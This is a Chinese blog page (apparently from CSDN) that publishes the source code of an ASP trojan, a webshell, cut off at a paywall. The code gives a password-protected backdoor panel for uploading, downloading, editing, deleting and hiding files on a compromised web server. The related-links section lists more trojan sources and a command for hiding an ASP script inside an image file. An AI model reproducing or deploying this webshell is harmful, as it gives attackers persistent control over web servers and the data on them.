一个典型的ASP木马程序源码

最新推荐文章于 2021-05-25 22:27:34 发布
VIP文章 最新推荐文章于 2021-05-25 22:27:34 发布
阅读量2.5k 收藏 1
点赞数 1
文章标签: asp function session fp table input
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/beyond2007/article/details/1515052
版权

<script language=JScript runat=server>
Response.Write ("欢迎您");
</script>
<%
mypass="chinait"
if request("userpass")=mypass then
session("admin")=mypass
end if

if request("logout")="退出登录" then
session("admin")=""
end if

if session("admin")="" then
response.write"<table width=500 border=0 align=center cellpadding=0 cellspacing=1 class=box>"
response.write"<form method=POST action=''>"
response.write"<tr height=18>"
response.write"<td height=25 align=center bgcolor=#003366 style=color:#ffffff>密码:&nbsp; "
response.write"<input type='password' name='userpass' size='20'>"
response.write"<input name='submit' type='submit' value='登录'>"
response.write"</td></tr></form></table>"
response.End()
end if
%>
<OBJECT RUNAT=Server ID=fs
classid='clsid:0D43FE01-F093-11CF-8940-00A0C9054228'></OBJECT>

<%gl=rq("gl"):if gl<>"" then Session("gl")=gl
Response.Clear:echo " "
echo "<a href="&self&"?gl=file>file</a> "
echo "<a href="&self&"?gl=sql>sql</a> "
echo "<a href="&self&"?gl=cmd>cmd</a> "
echo "<a href="&self&"?gl=listapp>listapp</a> "

pwd1="file":pwd2="sql":pwd3="cmd":pwd4="listapp":if Session("gl")="file" then

if left(aduser,4)="fso:" then
 fso=mid(aduser,5)
else
 fso="scripting.filesystemobject"
end if
echo fso
AdodbS="Adodb.Stream"
on error resume next
bbf=chr(13)&chr(10):y=chr(34):self=Request("URL")
function echo(lpstr):response.write lpstr:end function
function rq(lpstr):rq=request(lpstr):end function
function close():echo "<script>opener.document.location.reload();opener=null;self.close();</script>":response.end:end function


echo "<script>"&bbf
echo "window.οnerrοr=x_err;function x_err(sMsg,sUrl,sLine){return true}"&bbf
echo ""&"var url="""&replace(self,"/","//")&""";"&""&bbf
echo "function sattw(srcf){w=ow(350);w.location=url+""?fdo=gattr&fp1=""+srcf;}"&bbf
echo "function ren(f1,f2){location=url+""?fdo=ren&fp1=""+fp1+f1+""&fp2=""+fp1+document.all[f2].value;}"&bbf
echo "function downall(){ow(600).document.write(down);}"&bbf
echo "function replace(aa,bb,cc){var lpabc,lpi;for(lpi=0;lpi<1000;lpi++){lpabc=aa;aa=aa.replace(bb,cc);if(lpabc==aa)return aa;}return aa;}"&bbf
echo "function ow(w){return window.open("""","""",""scrollbars=no,toolbar=no,location=no,directories=no,status=no,menubar=no,resizable=no,height=300,width=""+w);}"&bbf
echo "</script>"&bbf
echo "<STYLE>body,td,span,div,a{FONT-SIZE:9pt;text-decoration:none}"&bbf
echo "span,a{cursor:hand;color:blue;}hr{height:1px;line-height:1px;color:#0000ff;}"&bbf
echo "</style><body Leftmargin=6 Topmargin=2>"&bbf

if not isobject(fs) then set fs= server.createobject(fso)
if fdo="" then fdo=lcase(request("fdo"))
fp1=request("fp1")
fp2=request("fp2")
if fdo="up" and Request.TotalBytes>20 then
 set dr1=server.CreateObject(AdodbS):dr1.Mode=3:dr1.Type=1:dr1.Open
 set dr2=server.CreateObject(AdodbS):dr2.Mode=3:dr2.Type=1:dr2.Open
 lnBytes=Request.BinaryRead(Request.TotalBytes)
 SignLen=Instrb(1,lnBytes,CStrB(bbf))-1
 Sign=MidB(lnBytes,1,SignLen)
 fname=tractName(getfilename()) '取文件名
 fp1=getvalue("fp1") '取路径值
 if fname<>"" and fp1<>"" then
  savefile(fp1&fname)
 else
  echo "文件名或路径错!"
 end if
 dr1.Close
 dr2.Close
 set dr1=nothing
 set dr2=nothing
 response.redirect self&"?fp1="&parentdir(fp1&"/")
end if
if fdo="down" then
 downFile(fp1)
 response.end
end if
if fdo="hide" then
 fp1=pn(fp1):fp2=fp1&"/desktop.ini"
 if not fs.fileExists(fp2) then
 fs.getfolder(fp1).attributes=22
 lr="[.ShellClassInfo]"+bbf+"CLSID={645FF040-5081-101B-9F08-00AA002F954E}"
 fs.createtextfile(fp2).Write lr
 fs.getfile(fp2).attributes=6
 echo "<script>alert('此目录已隐藏!');"
 else
 fs.getfolder(fp1).attributes=48
 fs.DeleteFile fp2,True
 echo "<script>alert('此目录已解除隐藏!');"
 end if
 echo "history.go(-1);</script>":response.end
end if
if fdo="adddir" then
 fp1=pn(fp1):fs.createfolder(fp1)
 response.redirect self&"?fp1="&fp1&"/"
end if
if fdo="newfile" then
 fp1=pn(fp1):if not fs.fileExists(fp1) then fs.createtextfile(fp1)
 response.redirect self&"?fp1="&parentdir(fp1&"/")
end if
if fdo="sedit" then
 fs.getfile(fp1).attributes=32
 fs.CreateTextFile(fp1).Write replace(Request("fp2"),"<_/"&"textarea>","</tex"&"tarea>")
 echo "<script>opener=null;self.close();</script>":response.end
end if
if fdo="gedit" then
 att=fs.getfile(fp1).attributes
 echo "<form METHOD=POST action="""&self&"""><input size=80 type=text name=fp1 value="""&fp1&"""><br>"
 echo "<input name=fdo value=sedit type=hidden><textarea cols=90 rows=20 name=fp2>"
 wj=fs.OpenTextFile(fp1,1,0,0).read(5000000)
 echo replace(replace(wj,"</tex"&"tarea>","<_/"&"textarea>"),"</TEX"&"TAREA>","<_/"&"textarea>")
 echo "</textarea><center><input type=submit value=-------保存-------> <a οnclick=opener=null;self.close();>放弃</a></form>"
 response.end
end if
if fdo="ren" then
 if fs.fileExists(fp1) then fs.movefile fp1,fp2
 if fs.folderExists(fp1) then fp1=pn(fp1):fs.movefolder fp1,pn(fp2):fp1=fp2
 response.redirect self&"?fp1="&parentdir(fp1&"/")
end if
if fdo="del" then
 if fs.fileExists(fp1) then fs.DeleteFile fp1,True
 if fs.folderExists(fp1) then fp1=pn(fp1):fs.Deletefolder fp1,True
 fp1=parentdir(fp1&"/")
 response.redirect self&"?fp1="&parentdir(fp1&"/")
end if
if fdo="copy" then
 if fs.fileExists(fp1) then fs.CopyFile fp1,fp2
 if fs.folderExists(fp1) then fs.Copyfolder pn(fp1),pn(fp2)
 close
end if
if fdo="sattr" then
 if fs.fileExists(fp1) then fs.getfile(fp1).attributes=fp2 or 32
 if fs.folderExists(fp1) then fs.getfolder(fp1).attributes=fp2 or 32
 echo "<script>opener=null;self.close();</script>":response.end
end if
if fdo="gattr" then
 if fs.fileExists(fp1) then att=fs.getfile(fp1).attributes
 if fs.folderExists(fp1) then att=fs.getfolder(fp1).attributes
 echo "<form name=fgs METHOD=POST action="""&self&""">"&fp1&"<br><input type=hidden name=fp1 value="""&fp1&""">"
 echo "只读<input type=checkbox name=c1 ":if att and 1 then echo "checked"
 echo "> 隐藏<input type=checkbox name=c2 ":if att and 2 then echo "checked"
 echo "> 系统<input type=checkbox name=c3 ":if att and 4 then echo "checked"
 echo "><center><br><input name=fdo value=sattr type=hidden><input name=fp2 value="&att&" type=hidden>"
 echo "<a οnclick='var s=0;if(c1.checked)s+=1;if(c2.checked)s+=2;;if(c3.checked)s+=4;fp2.value=s;fgs.submit();'>修改</a></form>"
 response.end
end if

'开始
if request("fp1")<>"" then session("fp1")=request("fp1")
if fp1="" then fp1=session("fp1")
echo "<table border=0 cellspacing=0 cellpadding=0><tr><td>"
echo "<form name=fu method=post action="""

最低0.47元/天 解锁文章
Beyond2007
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
不死僵尸ASP木马完全去后门源代码.
04-16
不知谁放在我的服务器上的,有兴趣的可以研究一下,不允许用于其他用途。ASP源代码。
一个ASP木马程序的源代码
weixin_34417814的博客
05-30 187
<%@ LANGUAGE = VBScript.Encode codepage ="936" %><%Server.ScriptTimeOut=5000%><object runat=server id=oScript scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object><object runat=...
透视木马程序开发技术: 源代码详解(上)
11-10 592
近年来,黑客技术不断成熟起来,对网络安全造成了极大的威胁,黑客的主要攻击手段之一,就是使用木马技术,渗透到对方的主机系统里,从而实现对远程操作目标主机。 其破坏力之大,是绝不容忽视的,黑客到底是如何制造了这种种具有破坏力的木马程序呢,下面我对木马进行源代码级的详细的分析,让我们对木马的开发技术做一次彻底的透视,从了解木马技术开始,更加安全的管理好自己的计算机。 1、木马程序的分类木马程序
asp 木马源码
Benson
12-20 234
ASP木马代码
asp 木马源码(窃用)
liangdiwei的专栏
12-20 601
ASP木马代码  on error resume next dim Data_五xsoft Class upload_五xsoft dim objForm,objFile,Version Public function Form(strForm) strForm=lcase(strForm) if not objForm.exists(st
淘特ASP木马扫描器 v1.1
04-01
该程序采用asp编写,可以扫描服务器上的所有指定类型(asp,cer,asa,cdx)的文件,查出可疑的木马程序。系统采用扫描程序与病毒库分离的形式,喜欢的朋友可以下载看看。
web木马终结者asp版v1.0
07-25
程序作用:去除网站木马 程序作者:Pui-ching 联系QQ:14069985 电子邮件:[email protected] 程序版本:学习版 使用技术:ASP Javascript Ajax 有疑问请随时联系作者 文件部署介绍: Include [全局文
淘特ASP木马扫描器 v1.1.rar
07-05
可以扫描服务器上的所有指定类型(asp,cer,asa,cdx)的文件,查出可疑的木马程序。系统采用扫描程序与病毒库分离的形式
asp开发的超级网站管理程序
03-25
可以读取注册表数据,可以端口扫描器等,而这一切只由一个文件操作控制,绝对超级强悍。 下面是管理后台列表: +>查看硬盘 本地磁盘(A:) 本地磁盘(C:) 本地磁盘(D:) 本地磁盘(E:) ->站点根目录 ->本程序...
ASP木马|木马|ASP木马|木马|ASP木马|木马
06-16
6个ASP大马 大马6个ASP大马 大马6个ASP大马 大马6个ASP大马 大马6个ASP大马 大马
淘特 ASP webshell 木马扫描器 v1.1 -ASP源码.zip
12-13
ASP源码,压缩包解压密码:www.cqlsoft.com
关于 asp 木马
sollion的专栏
01-13 1406
一、木马生成asp木马代码加密,图片合并,文件时间修改,还有要命的系统漏洞利用 图片和木马合并命令:copy 1.gif /b + asp.asp /a asp.gif  二、木马上传如果后台没有类似数据库备份功能,可以生成新文件,或者直接修改文件。那么很难直接让木马运行,不过还是有一些方法,可以考虑。     1、如果后台数据库是以asp格式存储的。那么可以采用在数据库中
引用 解密VBScript.Encode的asp代码 木马在线解密
PZHan的专栏
04-25 5553
<br />之前看到师兄做了一个查杀屏蔽iframe script 网马的文件,用了VBScript.Encode 进行加密,感觉还不错,于是问他拿了一个工具,顺便搜索了一下,找到了在线解密的源代码,下面给大家分享一下:<br />新建一个.htm文件,将以下内容复制到里面即可<br /><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transiti
c语言编木马程序,c语言编写的木马程序(源代码附上).doc
weixin_39633165的博客
05-17 401
c语言编写的木马程序(源代码附上).doc #include#pragmacomment(lib,“ws2_32.lib“)#include#include#pragmacomment(lib,“Shlwapi.lib“)#include#include#include//参数结构;typedefstruct_RemotePara{DWORDdwLoadLibrary;DWORDdwFreeLib...
c语言木马源代码,【C语言】后台木马程序
weixin_39583655的博客
05-25 384
该楼层疑似违规已被系统折叠隐藏此楼查看此楼DWORD dwWrited = 0, dwRecvd = 0;char szBuf[MAX_PATH] = {0};BOOL bRet = FALSE;while ( TRUE ) {dwRecvd = recv(tNode.m_Sock, szBuf, MAX_PATH, 0);if ( dwRecvd > 0 && dwRec...
c语言简单木马源代码,【C语言】后台木马程序
weixin_28909295的博客
05-25 2255
该楼层疑似违规已被系统折叠隐藏此楼查看此楼DWORD dwWrited = 0, dwRecvd = 0;char szBuf[MAX_PATH] = {0};BOOL bRet = FALSE;while ( TRUE ) {dwRecvd = recv(tNode.m_Sock, szBuf, MAX_PATH, 0);if ( dwRecvd > 0 && dwRec...
c语言木马程序,网上看到的一个用C语言编写的木马源程序代码大家一起学学
weixin_39653764的博客
05-17 915
c程序源码以下是在网上看到的一个用C语言编写的木马源程序代码大家一起学学#include#pragma comment(lib,"ws2_32.lib")#include#include #pragma comment(lib,"Shlwapi.lib")#include #include #include //参数结构 ;typedef struct _RemotePara{DWORD dwLo...
研究分析QQ木马程序源代码
回家念经(kv300)--编程之禅
08-09 9535
    QQ 木马的源代码   如何判断系统如何操作注册表如何通过控制自己的进程得到其他进程的内容如何复制文件如何插入进程[也叫进程注射,好像这么叫]如何通过SMTP法送邮件针对QQ1230及2003版的木马程序源代码,兼容win98,2000,不显示进程。 首先请大家不要骂我,我早已对QQ不感兴趣,不过好久没有听说新的盗QQ号的程序,还是觉得有点奇怪,问了几个人,听说新版的QQ增
提供一个旅游小程序源码
最新发布
06-01
很抱歉,我作为AI语言模型无法提供实际的源码,但是我可以给你提供一些旅游小程序开发的参考和建议: - 可以借鉴一些现有的旅游小程序的设计和功能,如去哪儿网、携程旅行等; - 在小程序中可以实现线路推荐、预订、支付、评价等功能,同时还可以集成天气预报、地图导航等服务; - 为了提高用户体验,可以使用一些动画效果和交互设计,如下拉刷新、无限滚动、轮播图等; - 在小程序中可以使用一些第三方服务,如高德地图、百度地图、支付宝等,来实现一些功能; - 在小程序中可以使用云开发服务,如云函数、云数据库等,来实现数据的存储和处理。 以上是一些旅游小程序开发的建议和参考,具体实现还需要根据自己的需求和技术水平进行调整和优化。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值